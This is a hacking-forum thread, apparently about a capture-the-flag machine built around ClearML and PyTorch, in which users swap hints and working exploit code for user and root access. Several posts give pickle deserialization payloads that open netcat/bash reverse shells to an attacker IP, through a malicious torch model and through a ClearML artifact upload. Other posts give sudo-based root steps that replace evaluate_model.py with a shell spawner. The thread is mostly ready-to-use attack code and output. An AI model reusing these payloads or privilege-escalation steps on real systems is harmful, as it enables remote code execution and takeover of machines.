[maggi]

Is clearml-init with new keys from admin panel any help towards root?

[fuliye]

Guys any something hint for user LOL？

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[chillywilly]

root:
sudo -l

[Th3B4h0z]

for root --

import torch
import torch.nn as nn
import os
class CustomModel(nn.Module):
    def __init__(self):
        super(CustomModel, self).__init__()
        self.linear = nn.Linear(10, 1)
   
    def forward(self, x):
        return self.linear(x)
   
    def __reduce__(self):
        # Custom reduce method
        cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.X.X 4445 >/tmp/f"
        return os.system, (cmd,)
# Create an instance of the model
model = CustomModel()
# Save the model using torch.save
torch.save(model, 'evil.pth')

[imassxck]

what is this error ?

import torch
import torch.nn as nn
import os
import tarfile
class CustomModel(nn.Module):
    def __init__(self):
        super(CustomModel, self).__init__()
        self.linear = nn.Linear(10, 1)
    def forward(self, x):
        return self.linear(x)
    def __reduce__(self):
        # Custom reduce method
        cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx xxxx >/tmp/f"
        return os.system, (cmd,)
   
# Create an instance of the model
model = CustomModel()
# Save the model using torch.save
os.makedirs('/tmp/storages', exist_ok=True)
torch.save(model.state_dict(), '/tmp/storages/evil.pth')
with tarfile.open('/tmp/evil_model.pth', 'w') as tar:
    tar.add('/tmp/storages', arcname='storages')

$ python3 evil.py
$ mv /tmp/evil_model.pth /models/
$ sudo /usr/bin/evaluate_model /models/evil_model.pth
[+] Model /models/evil_model.pth is considered safe. Processing...
Traceback (most recent call last):
  File "/models/evaluate_model.py", line 76, in <module>
    main(model_path)
  File "/models/evaluate_model.py", line 65, in main
    model = load_model(model_path)
  File "/models/evaluate_model.py", line 32, in load_model
    state_dict = torch.load(model_path)
  File "/usr/local/lib/python3.9/dist-packages/torch/serialization.py", line 1040, in load
    return _legacy_load(opened_file, map_location, pickle_module, **pickle_load_args)
  File "/usr/local/lib/python3.9/dist-packages/torch/serialization.py", line 1243, in _legacy_load
    return legacy_load(f)
  File "/usr/local/lib/python3.9/dist-packages/torch/serialization.py", line 1130, in legacy_load
    with open(os.path.join(tmpdir, 'storages'), 'rb', 0) as f:
IsADirectoryError: [Errno 21] Is a directory: '/tmp/tmpbtk_f6kw/storages'

[ritualist]

For root you can also just take the .pkl you created to get user and replace the one in the demo.
No need to really create something custom with torch.

[testermoment]

For root you can also just take the .pkl you created to get user and replace the one in the demo.
No need to really create something custom with torch.

Ive been trying to get root for a while, I execute my malicious pth and the shell that i get is still user. When i try to sudo evaluate_model, I get asked for a password but i did not locate the password anywhere for the user.

What am I msising?

[ritualist]

For root you can also just take the .pkl you created to get user and replace the one in the demo.
No need to really create something custom with torch.

Ive been trying to get root for a while, I execute my malicious pth and the shell that i get is still user. When i try to sudo evaluate_model, I get asked for a password but i did not locate the password anywhere for the user.

What am I msising?

Make sure to call it exactly as sudo -l says, it will not need a password. E.g.

sudo /usr/bin/evaluate_model /models/*.pth

or

sudo /usr/bin/evaluate_model /models/mymodel.pth

[Szakyro]

Payload exploit.py

#!/usr/bin/env python3
import os
import pickle
from clearml import Task
class RunCommand:
    def __reduce__(self):
        return (os.system, ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.xx 443 >/tmp/f',))
command = RunCommand()
task = Task.init(project_name='Black Swan', task_name='pickle_artifact_upload', tags=['review'], output_uri=True)
task.upload_artifact(name='pickle_artifact', artifact_object=command, retries=2, wait_on_upload=True)

Root

rm -rf /usr/bin/evaluate_model.py
echo -e 'import pty\npty.spawn("/bin/bash")' > evaluate_model.py
sudo /usr/bin/evaluate_model /models/*.pth

Can you please tell me where do you need to enter that payload? I'm cloning one of the training models and editing it and putting the pyload in uncommited changes, but it's not triggering after adding it in queue

[Szakyro]

Payload exploit.py

#!/usr/bin/env python3
import os
import pickle
from clearml import Task
class RunCommand:
    def __reduce__(self):
        return (os.system, ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.xx 443 >/tmp/f',))
command = RunCommand()
task = Task.init(project_name='Black Swan', task_name='pickle_artifact_upload', tags=['review'], output_uri=True)
task.upload_artifact(name='pickle_artifact', artifact_object=command, retries=2, wait_on_upload=True)

Root

rm -rf /usr/bin/evaluate_model.py
echo -e 'import pty\npty.spawn("/bin/bash")' > evaluate_model.py
sudo /usr/bin/evaluate_model /models/*.pth

Can you please tell me where do you need to enter that payload? I'm cloning one of the training models and editing it and putting the pyload in uncommited changes, but it's not triggering after adding it in queue

In comment it's a full solution for user flag. Just clearml-init -> paste your config(app{...}, you can copy it from website), run that python script, it will init new task, upload artifact to it and add review tagg to trigger user to run it.

The strange thing is that I did that, and I have netcat listening on the port specified in it, but for some reason no connection is coming to netcat, and no revshell is triggered.

That's why I was still asking...